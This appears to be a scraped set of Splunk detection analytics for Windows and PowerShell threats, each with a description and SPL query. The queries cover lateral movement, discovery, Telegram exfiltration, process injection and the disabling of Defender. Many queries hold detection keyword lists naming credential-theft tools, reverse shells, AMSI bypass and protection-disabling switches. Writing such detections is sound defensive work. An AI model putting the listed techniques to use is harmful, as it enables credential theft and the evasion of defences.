It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process names, as well as command-line executions.
This activity is significant as it could indicates lateral movement or remote code execution attempts by adversaries.
If confirmed malicious, this behavior could allow attackers to execute code remotely, escalate privileges, or persist within the environment.
Show query
| tstats `security_content_summariesonly`
count min(_time) as firstTime
max(_time) as lastTime
from datamodel=Endpoint.Processes where
(
Processes.parent_process_name IN (
"mmc.exe",
"services.exe",
"wmiprvse.exe",
"wsmprovhost.exe"
)
OR
(
Processes.parent_process_name="svchost.exe"
```
We exclude the "Schedule" service from the svchost.exe process. But since there are instances where its not hosted in a dedicated svchost process, we need to the hosting group "netsvcs" too
```
NOT Processes.parent_process IN (
"*-k netsvcs*",
"*-s Schedule*",
)
)
)
AND
(
Processes.process_name IN ("powershell.exe", "pwsh.exe")
OR
(
Processes.process_name=cmd.exe
Processes.process IN (
"*powershell*",
"*pwsh*"
)
)
)
NOT Processes.process IN ("*C:\\Windows\\CCM\\*")
by Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec
Processes.parent_process_guid Processes.parent_process_id
Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid
Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `possible_lateral_movement_powershell_spawn_filter`Potential System Network Configuration Discovery Activity
The following analytic identifies the rapid execution of processes used for system network configuration discovery on an endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUIDs, names, parent processes, and command-line executions. This activity can be significant as it may indicate an attacker attempting to map the network, which is a common precursor to lateral movement or further exploitation. If confirmed malicious, this behavior could allow an attacker to gain insights into the network topology, identify critical systems, and plan subsequent attacks, potentially leading to data exfiltration or system compromise.
Show query
| tstats `security_content_summariesonly`
count values(Processes.process) as process
values(Processes.parent_process) as parent_process
min(_time) as firstTime
max(_time) as lastTime
from datamodel=Endpoint.Processes where
NOT Processes.user IN ("","unknown")
by Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid Processes.process_hash
Processes.process_id Processes.process_integrity_level Processes.process_name Processes.process_path
Processes.user Processes.user_id Processes.vendor_product _time
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `drop_dm_object_name(Processes)`
| search process_name IN (
"arp.exe",
"dsquery.exe",
"hostname.exe",
"ipconfig.exe",
"nbstat.exe",
"net.exe",
"net1.exe",
"nltest.exe",
"netsh.exe",
"nslookup.exe",
"ping.exe",
"quser.exe",
"qwinsta.exe",
"telnet.exe",
"tracert.exe",
)
| transaction dest connected=false maxpause=5m
| where eventcount>=5
| `potential_system_network_configuration_discovery_activity_filter`
Potential Telegram API Request Via CommandLine
The following analytic detects the presence of "api.telegram.org" in the CommandLine of a process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity can be significant as the telegram API has been used as an exfiltration mechanism or even as a C2 channel. If confirmed malicious, this could allow an attacker or malware to exfiltrate data or receive additional C2 instruction, potentially leading to further compromise and persistence within the network.
Show query
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
WHERE Processes.process= "*api.telegram.org*" NOT Processes.process IN ("*-osint -url*", "* --single-argument*")
BY Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid
Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `potential_telegram_api_request_via_commandline_filter`Potential password in username
The following analytic identifies instances where users may have mistakenly entered their passwords in the username field during authentication attempts. It detects this by analyzing failed authentication events with usernames longer than 7 characters and high Shannon entropy, followed by a successful authentication from the same source to the same destination. This activity is significant as it can indicate potential security risks, such as password exposure. If confirmed malicious, attackers could exploit this to gain unauthorized access, leading to potential data breaches or further compromise of the system.
Show query
| tstats `security_content_summariesonly` earliest(_time) AS starttime latest(_time) AS endtime latest(sourcetype) AS sourcetype values(Authentication.src) AS src values(Authentication.dest) AS dest count FROM datamodel=Authentication WHERE nodename=Authentication.Failed_Authentication BY "Authentication.user" | `drop_dm_object_name(Authentication)` | lookup ut_shannon_lookup word AS user | where ut_shannon>3 AND len(user)>=8 AND mvcount(src) == 1 | sort count, - ut_shannon | eval incorrect_cred=user | eval endtime=endtime+1000 | map maxsearches=70 search=" | tstats `security_content_summariesonly` earliest(_time) AS starttime latest(_time) AS endtime latest(sourcetype) AS sourcetype values(Authentication.src) AS src values(Authentication.dest) AS dest count FROM datamodel=Authentication WHERE nodename=Authentication.Successful_Authentication Authentication.src=\"$src$\" Authentication.dest=\"$dest$\" sourcetype IN (\"$sourcetype$\") earliest=\"$starttime$\" latest=\"$endtime$\" BY \"Authentication.user\" | `drop_dm_object_name(\"Authentication\")` | `potential_password_in_username_false_positive_reduction` | eval incorrect_cred=\"$incorrect_cred$\" | eval ut_shannon=\"$ut_shannon$\" | sort count" | where user!=incorrect_cred | outlier action=RM count | `potential_password_in_username_filter`
PowerShell - Connect To Internet With Hidden Window
The following analytic detects PowerShell commands using the WindowStyle parameter to hide the window while connecting to the Internet. This behavior is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions that include variations of the WindowStyle parameter. This activity is significant because it attempts to bypass default PowerShell execution policies and conceal its actions, which is often indicative of malicious intent. If confirmed malicious, this could allow an attacker to execute commands stealthily, potentially leading to unauthorized data exfiltration or further compromise of the endpoint.
Show query
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
WHERE `process_powershell`
BY Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid
Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| where match(process,"(?i)[\-
| \/
| –
| —
| ―]w(in*d*o*w*s*t*y*l*e*)*\s+[^-]")
| `powershell___connect_to_internet_with_hidden_window_filter`PowerShell 4104 Hunting
The following analytic identifies suspicious PowerShell execution using Script Block Logging (EventCode 4104). It leverages specific patterns and keywords within the ScriptBlockText field to detect potentially malicious activities. This detection is significant for SOC analysts as PowerShell is commonly used by attackers for various malicious purposes, including code execution, privilege escalation, and persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary commands, exfiltrate data, or maintain long-term access to the compromised system, posing a severe threat to the organization's security.
Show query
`powershell` EventCode=4104
| eval DoIt = if(match(ScriptBlockText,"(?i)(\$doit)"), "4", 0)
| eval enccom=if(match(ScriptBlockText,"[A-Za-z0-9+\/]{44,}([A-Za-z0-9+\/]{4}
| [A-Za-z0-9+\/]{3}=
| [A-Za-z0-9+\/]{2}==)") OR match(ScriptBlockText, "(?i)[-]e(nc*o*d*e*d*c*o*m*m*a*n*d*)*\s+[^-]"),4,0)
| eval suspcmdlet=if(match(ScriptBlockText, "(?i)Add-Exfiltration
| Add-Persistence
| Add-RegBackdoor
| Add-ScrnSaveBackdoor
| Check-VM
| Do-Exfiltration
| Enabled-DuplicateToken
| Exploit-Jboss
| Find-Fruit
| Find-GPOLocation
| Find-TrustedDocuments
| Get-ApplicationHost
| Get-ChromeDump
| Get-ClipboardContents
| Get-FoxDump
| Get-GPPPassword
| Get-IndexedItem
| Get-Keystrokes
| LSASecret
| Get-PassHash
| Get-RegAlwaysInstallElevated
| Get-RegAutoLogon
| Get-RickAstley
| Get-Screenshot
| Get-SecurityPackages
| Get-ServiceFilePermission
| Get-ServicePermission
| Get-ServiceUnquoted
| Get-SiteListPassword
| Get-System
| Get-TimedScreenshot
| Get-UnattendedInstallFile
| Get-Unconstrained
| Get-VaultCredential
| Get-VulnAutoRun
| Get-VulnSchTask
| Gupt-Backdoor
| HTTP-Login
| Install-SSP
| Install-ServiceBinary
| Invoke-ACLScanner
| Invoke-ADSBackdoor
| Invoke-ARPScan
| Invoke-AllChecks
| Invoke-BackdoorLNK
| Invoke-BypassUAC
| Invoke-CredentialInjection
| Invoke-DCSync
| Invoke-DllInjection
| Invoke-DowngradeAccount
| Invoke-EgressCheck
| Invoke-Inveigh
| Invoke-InveighRelay
| Invoke-Mimikittenz
| Invoke-NetRipper
| Invoke-NinjaCopy
| Invoke-PSInject
| Invoke-Paranoia
| Invoke-PortScan
| Invoke-PoshRat
| Invoke-PostExfil
| Invoke-PowerDump
| Invoke-PowerShellTCP
| Invoke-PsExec
| Invoke-PsUaCme
| Invoke-ReflectivePEInjection
| Invoke-ReverseDNSLookup
| Invoke-RunAs
| Invoke-SMBScanner
| Invoke-SSHCommand
| Invoke-Service
| Invoke-Shellcode
| Invoke-Tater
| Invoke-ThunderStruck
| Invoke-Token
| Invoke-UserHunter
| Invoke-VoiceTroll
| Invoke-WScriptBypassUAC
| Invoke-WinEnum
| MailRaider
| New-HoneyHash
| Out-Minidump
| Port-Scan
| PowerBreach
| PowerUp
| PowerView
| Remove-Update
| Set-MacAttribute
| Set-Wallpaper
| Show-TargetScreen
| Start-CaptureServer
| VolumeShadowCopyTools
| NEEEEWWW
| (Computer
| User)Property
| CachedRDPConnection
| get-net\S+
| invoke-\S+hunter
| Install-Service
| get-\S+(credent
| password)
| remoteps
| Kerberos.*(policy
| ticket)
| netfirewall
| Uninstall-Windows
| Verb\s+Runas
| AmsiBypass
| nishang
| Invoke-Interceptor
| EXEonRemote
| NetworkRelay
| PowerShelludp
| PowerShellIcmp
| CreateShortcut
| copy-vss
| invoke-dll
| invoke-mass
| out-shortcut
| Invoke-ShellCommand"),1,0)
| eval base64 = if(match(lower(ScriptBlockText),"frombase64"), "4", 0)
| eval empire=if(match(lower(ScriptBlockText),"system.net.webclient") AND match(lower(ScriptBlockText), "frombase64string") ,5,0)
| eval mimikatz=if(match(lower(ScriptBlockText),"mimikatz") OR match(lower(ScriptBlockText), "-dumpcr") OR match(lower(ScriptBlockText), "SEKURLSA::Pth") OR match(lower(ScriptBlockText), "kerberos::ptt") OR match(lower(ScriptBlockText), "kerberos::golden") ,5,0)
| eval iex=if(match(ScriptBlockText, "(?i)iex
| invoke-expression"),2,0)
| eval webclient=if(match(lower(ScriptBlockText),"http") OR match(lower(ScriptBlockText),"web(client
| request)") OR match(lower(ScriptBlockText),"socket") OR match(lower(ScriptBlockText),"download(file
| string)") OR match(lower(ScriptBlockText),"bitstransfer") OR match(lower(ScriptBlockText),"internetexplorer.application") OR match(lower(ScriptBlockText),"xmlhttp"),5,0)
| eval get = if(match(lower(ScriptBlockText),"get-"), "1", 0)
| eval rundll32 = if(match(lower(ScriptBlockText),"rundll32"), "4", 0)
| eval suspkeywrd=if(match(ScriptBlockText, "(?i)(bitstransfer
| mimik
| metasp
| AssemblyBuilderAccess
| Reflection\.Assembly
| shellcode
| injection
| cnvert
| shell\.application
| start-process
| Rc4ByteStream
| System\.Security\.Cryptography
| lsass\.exe
| localadmin
| LastLoggedOn
| hijack
| BackupPrivilege
| ngrok
| comsvcs
| backdoor
| brute.?force
| Port.?Scan
| Exfiltration
| exploit
| DisableRealtimeMonitoring
| beacon)"),1,0)
| eval syswow64 = if(match(lower(ScriptBlockText),"syswow64"), "3", 0)
| eval httplocal = if(match(lower(ScriptBlockText),"http://127.0.0.1"), "4", 0)
| eval reflection = if(match(lower(ScriptBlockText),"reflection"), "1", 0)
| eval invokewmi=if(match(lower(ScriptBlockText), "(?i)(wmiobject
| WMIMethod
| RemoteWMI
| PowerShellWmi
| wmicommand)"),5,0)
| eval downgrade=if(match(ScriptBlockText, "(?i)([-]ve*r*s*i*o*n*\s+2)") OR match(lower(ScriptBlockText),"powershell -version"),3,0)
| eval compressed=if(match(ScriptBlockText, "(?i)GZipStream
| ::Decompress
| IO.Compression
| write-zip
| (expand
| compress)-Archive"),5,0)
| eval invokecmd = if(match(lower(ScriptBlockText),"invoke-command"), "4", 0)
| addtotals fieldname=Score DoIt, enccom, suspcmdlet, suspkeywrd, compressed, downgrade, mimikatz, iex, empire, rundll32, webclient, syswow64, httplocal, reflection, invokewmi, invokecmd, base64, get
| stats values(Score)
BY UserID, Computer, DoIt,
enccom, compressed, downgrade,
iex, mimikatz, rundll32,
empire, webclient, syswow64,
httplocal, reflection, invokewmi,
invokecmd, base64, get,
suspcmdlet, suspkeywrd
| rename Computer as dest, UserID as user
| `powershell_4104_hunting_filter`PowerShell Domain Enumeration
The following analytic detects the execution of PowerShell commands used for domain enumeration, such as `get-netdomaintrust` and `get-adgroupmember`. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as it often indicates reconnaissance efforts by an attacker to map out the domain structure and identify key users and groups. If confirmed malicious, this behavior could lead to further targeted attacks, privilege escalation, and unauthorized access to sensitive information within the domain.
Show query
`powershell` EventCode=4104 ScriptBlockText IN (*get-netdomaintrust*, *get-netforesttrust*, *get-addomain*, *get-adgroupmember*, *get-domainuser*)
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_domain_enumeration_filter`PowerShell Enable PowerShell Remoting
The following analytic detects the use of the Enable-PSRemoting cmdlet, which allows PowerShell remoting on a local or remote computer. This detection leverages PowerShell Script Block Logging (EventCode 4104) to identify when this cmdlet is executed. Monitoring this activity is crucial as it can indicate an attacker enabling remote command execution capabilities on a compromised system. If confirmed malicious, this activity could allow an attacker to take control of the system remotely, execute commands, and potentially pivot to other systems within the network, leading to further compromise and lateral movement.
Show query
`powershell` EventCode=4104 ScriptBlockText="*Enable-PSRemoting*"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_enable_powershell_remoting_filter`PowerShell Environment Variable Execution
The following analytic detects the execution of PowerShell scripts that combine environment variable access (`$env:` or `[Environment]::SetEnvironmentVariable`) with `Invoke-Expression` or its alias `iex` to dynamically construct and run code at runtime. This technique is commonly used by adversaries to stage and execute payloads by embedding commands or encoded content inside environment variables, then evaluating them on the fly — effectively hiding the true execution intent from static inspection. Detection is based on PowerShell Script Block Logging (Event ID 4104), which captures the de-obfuscated script block before it executes. Triggering this analytic indicates a potential attempt to execute environment-variable-stored code, a behavior observed in malware loaders and stagers, including those associated with the VIP Keylogger campaign.
Show query
`powershell`
EventCode=4104
ScriptBlockText="*$env:*"
ScriptBlockText IN (
"*.Invoke()*",
"*[scriptblock]::Create*",
"*iex *",
"*Invoke-Expression*"
)
ScriptBlockText="*[Environment]::SetEnvironmentVariable*"
| regex ScriptBlockText="(?i)((invoke-expression|iex\s+|\biex\b).*\$env:|\[scriptblock\]::create\s*\(\s*\$env:[^)]+\)\s*(?:\.\s*invoke\s*\(\s*\))?)"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
by dest signature signature_id user_id vendor_product EventID Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_environment_variable_execution_filter`PowerShell Get LocalGroup Discovery
The following analytic identifies the use of the `get-localgroup` command executed via PowerShell or cmd.exe to enumerate local groups on an endpoint. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is significant as it may indicate an attacker attempting to gather information about local group memberships, which can be a precursor to privilege escalation. If confirmed malicious, this activity could allow an attacker to identify and target privileged accounts, potentially leading to unauthorized access and control over the system.
Show query
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
WHERE (
Processes.process_name=powershell.exe
OR
Processes.process_name=cmd.exe
)
(Processes.process="*get-localgroup*")
BY Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid
Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_get_localgroup_discovery_filter`PowerShell Invoke CIMMethod CIMSession
The following analytic detects the creation of a New-CIMSession cmdlet followed by the use of the Invoke-CIMMethod cmdlet within PowerShell. It leverages PowerShell Script Block Logging to identify these specific cmdlets in the ScriptBlockText field. This activity is significant because it mirrors the behavior of the Invoke-WMIMethod cmdlet, often used for remote code execution via NTLMv2 pass-the-hash authentication. If confirmed malicious, this could allow an attacker to execute commands remotely, potentially leading to unauthorized access and control over targeted systems.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*invoke-CIMMethod*", "*New-CimSession*")
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_invoke_cimmethod_cimsession_filter`PowerShell Invoke WmiExec Usage
The following analytic detects the execution of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). This detection leverages PowerShell script block logs to identify instances where the Invoke-WMIExec command is used. Monitoring this activity is crucial as it indicates potential lateral movement using WMI commands with NTLMv2 pass-the-hash authentication. If confirmed malicious, this activity could allow an attacker to execute commands remotely on target systems, potentially leading to further compromise and lateral spread within the network.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*invoke-wmiexec*")
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_invoke_wmiexec_usage_filter`PowerShell Loading DotNET into Memory via Reflection
The following analytic detects the use of PowerShell scripts to load .NET assemblies into memory via reflection, a technique often used in malicious activities such as those by Empire and Cobalt Strike. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command executed. This behavior is significant as it can indicate advanced attack techniques aiming to execute code in memory, bypassing traditional defenses. If confirmed malicious, this activity could lead to unauthorized code execution, privilege escalation, and persistent access within the environment.
Show query
`powershell` EventCode=4104
ScriptBlockText IN (
"*.LoadFrom(*",
"*.LoadModule(*",
"*.LoadWithPartialName*",
"*Reflection.Assembly.Load*",
"*Reflection.Assembly]::('daoL'[-1..-4] -join '')*",
"*Reflection.Assembly]::Load*",
"*ReflectionOnlyLoad*",
"*UnsafeLoadFrom*"
)
| fillnull
| stats count min(_time) as firstTime
max(_time) as lastTime
by dest signature signature_id user_id
vendor_product EventID Guid Opcode
Name Path ProcessID
ScriptBlockId ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_loading_dotnet_into_memory_via_reflection_filter`PowerShell PInvoke Process Injection API Chain
The following analytic detects PowerShell Script Block Logging (Event ID 4104) evidence of a complete P/Invoke process-injection API chain at either the compile phase or the execution phase.
Portions of this search were modified to retain the same functionality while preventing antivirus products from alerting on the detection itself
Show query
`powershell`
EventCode=4104
ScriptBlockText="*add-type*"
ScriptBlockText="*DllImport*"
ScriptBlockText IN (
"*extern IntPtr*",
"*extern bool*",
"*extern uint*",
"*extern int*"
)
| where
(
match(ScriptBlockText, "(?i)[v][i][r][t][u][a][l][a][l][l][o][c]")
AND match(ScriptBlockText, "(?i)[v][i][r][t][u][a][l][p][r][o][t][e][c][t]")
AND match(ScriptBlockText, "(?i)[c][r][e][a][t][e][t][h][r][e][a][d]")
)
OR
(
match(ScriptBlockText, "(?i)[o][p][e][n][p][r][o][c][e][s][s]")
AND match(ScriptBlockText, "(?i)[v][i][r][t][u][a][l][a][l][l][o][c]")
AND match(ScriptBlockText, "(?i)[w][r][i][t][e][p][r][o][c][e][s][s][m][e][m][o][r][y]")
AND (
match(ScriptBlockText, "(?i)[c][r][e][a][t][e][r][e][m][o][t][e][t][h][r][e][a][d]")
OR
match(ScriptBlockText, "(?i)[q][u][e][u][e][u][s][e][r][a][p][c]")
)
)
OR
(
match(ScriptBlockText, "(?i)[o][p][e][n][t][h][r][e][a][d]")
AND match(ScriptBlockText, "(?i)[s][u][s][p][e][n][d][t][h][r][e][a][d]")
AND match(ScriptBlockText, "(?i)[g][e][t][t][h][r][e][a][d][c][o][n][t][e][x][t]")
AND match(ScriptBlockText, "(?i)[w][r][i][t][e][p][r][o][c][e][s][s][m][e][m][o][r][y]")
AND match(ScriptBlockText, "(?i)[s][e][t][t][h][r][e][a][d][c][o][n][t][e][x][t]")
AND match(ScriptBlockText, "(?i)[r][e][s][u][m][e][t][h][r][e][a][d]")
)
OR
(
match(ScriptBlockText, "(?i)[c][r][e][a][t][e][p][r][o][c][e][s][s]")
AND match(ScriptBlockText, "(?i)[v][i][r][t][u][a][l][a][l][l][o][c]")
AND match(ScriptBlockText, "(?i)[w][r][i][t][e][p][r][o][c][e][s][s][m][e][m][o][r][y]")
AND match(ScriptBlockText, "(?i)[s][e][t][t][h][r][e][a][d][c][o][n][t][e][x][t]")
AND ScriptBlockText = "*ResumeThread*"
)
OR
(
match(ScriptBlockText, "(?i)[n][t][c][r][e][a][t][e][s][e][c][t][i][o][n]")
AND match(ScriptBlockText, "(?i)[n][t][m][a][p][v][i][e][w][o][f][s][e][c][t][i][o][n]")
AND match(ScriptBlockText, "(?i)[c][r][e][a][t][e][r][e][m][o][t][e][t][h][r][e][a][d]")
)
| fillnull
| stats count min(_time) as firstTime
max(_time) as lastTime
by dest signature signature_id user_id vendor_product EventID
Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_pinvoke_process_injection_api_chain_filter`PowerShell Script Block With URL Chain
The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. It leverages PowerShell operational logs to detect script blocks with embedded URLs, often indicative of obfuscated scripts or those attempting to download secondary payloads. This activity is significant as it may signal an attempt to execute malicious code or download additional malware. If confirmed malicious, this could lead to code execution, further system compromise, or data exfiltration. Review parallel processes and the full script block for additional context and related artifacts.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*http:*","*https:*") | regex ScriptBlockText="(\"?(https?:\/\/(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&\/=]*))\"?(?:,|\))?){2,}" | rex max_match=20 field=ScriptBlockText "(?<url>https?:\/\/(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&\/=]*))" | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id user_id vendor_product EventID Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_script_block_with_url_chain_filter`PowerShell Start or Stop Service
The following analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. It leverages PowerShell Script Block Logging to detect these commands. This activity is significant because attackers can manipulate services to disable or stop critical functions, causing system instability or disrupting business operations. If confirmed malicious, this behavior could allow attackers to disable security services, evade detection, or disrupt essential services, leading to potential system downtime and compromised security.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*start-service*", "*stop-service*")
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_start_or_stop_service_filter`PowerShell Start-BitsTransfer
The following analytic detects the execution of the PowerShell command `Start-BitsTransfer`, which can be used for file transfers, including potential data exfiltration. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant because `Start-BitsTransfer` can be abused by adversaries to upload sensitive files to remote locations, posing a risk of data loss. If confirmed malicious, this could lead to unauthorized data exfiltration, compromising sensitive information and potentially leading to further exploitation of the network.
Show query
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
WHERE `process_powershell` Processes.process=*start-bitstransfer*
BY Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid
Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user
Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_start_bitstransfer_filter`PowerShell WebRequest Using Memory Stream
The following analytic detects the use of .NET classes in PowerShell to download a URL payload directly into memory, a common fileless malware staging technique. It leverages PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell commands involving `system.net.webclient`, `system.net.webrequest`, and `IO.MemoryStream`. This activity is significant as it indicates potential fileless malware execution, which is harder to detect and can bypass traditional file-based defenses. If confirmed malicious, this technique could allow attackers to execute code in memory, evade detection, and maintain persistence in the environment.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*system.net.webclient*","*system.net.webrequest*") AND ScriptBlockText="*IO.MemoryStream*"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_webrequest_using_memory_stream_filter`Powershell COM Hijacking InprocServer32 Modification
The following analytic detects attempts to modify or add a Component Object Model (COM) entry to the InProcServer32 path within the registry using PowerShell. It leverages PowerShell ScriptBlock Logging (EventCode 4104) to identify suspicious script blocks that target the InProcServer32 registry path. This activity is significant because modifying COM objects can be used for persistence or privilege escalation by attackers. If confirmed malicious, this could allow an attacker to execute arbitrary code or maintain persistent access to the compromised system, posing a severe security risk.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*Software\\Classes\\CLSID\\*\\InProcServer32*" | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id user_id vendor_product EventID Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_com_hijacking_inprocserver32_modification_filter`
Powershell Creating Thread Mutex
The following analytic detects the execution of PowerShell scripts using the `mutex` function via EventCode 4104. This detection leverages PowerShell Script Block Logging to identify scripts that create thread mutexes, a technique often used in obfuscated scripts to ensure only one instance runs on a compromised machine. This activity is significant as it may indicate the presence of sophisticated malware or persistence mechanisms. If confirmed malicious, the attacker could maintain exclusive control over a process, potentially leading to further exploitation or persistence within the environment.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*Threading.Mutex*"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
BY dest signature signature_id
user_id vendor_product EventID
Guid Opcode Name
Path ProcessID ScriptBlockId
ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_creating_thread_mutex_filter`Powershell Disable Security Monitoring
The following analytic identifies attempts to disable Windows Defender
real-time behavior monitoring via PowerShell commands. It detects the use of specific
`Set-MpPreference` parameters that disable various security features. This activity
is significant as it is commonly used by malware such as RATs, bots, or Trojans
to evade detection by disabling antivirus protections. If confirmed malicious, this
action could allow an attacker to operate undetected, leading to potential data
exfiltration, further system compromise, or persistent access within the environment.
Show query
| tstats `security_content_summariesonly`
count min(_time) as firstTime
max(_time) as lastTime
from datamodel=Endpoint.Processes where
`process_powershell`
Processes.process="*Set-MpPreference*"
(
Processes.process IN (
"*DisableArchiveScanning*",
"*DisableBehaviorMonitoring*",
"*DisableBlockAtFirstSeen*",
"*DisableCatchupFullScan*",
"*DisableCatchupQuickScan*",
"*DisableIOAVProtection*",
"*DisableRealtimeMonitoring*",
"*DisableRemovableDriveScanning*",
"*DisableRestorePoint*",
"*DisableScanningMappedNetworkDrivesForFullScan*",
"*DisableScanningNetworkFiles*",
"*DisableScriptScanning*",
"*drdsc*",
"*dsnf *",
"*drtm *",
"*dioavp *",
"*dscrptsc *",
"*dbaf *",
"*darchsc *",
"*dcfsc *",
"*dbm *"
)
Processes.process IN (
"* $true*",
"* 1*"
)
)
OR
(
Processes.process = "*PUAProtection*"
Processes.process = "*disable*"
)
OR
(
Processes.process = "*CloudBlockLevel*"
Processes.process IN (
"* $false*",
"* 0*"
)
)
by Processes.action Processes.dest Processes.original_file_name Processes.parent_process
Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id
Processes.parent_process_name Processes.parent_process_path Processes.process Processes.process_exec
Processes.process_guid Processes.process_hash Processes.process_id Processes.process_integrity_level
Processes.process_name Processes.process_path Processes.user Processes.user_id Processes.vendor_product
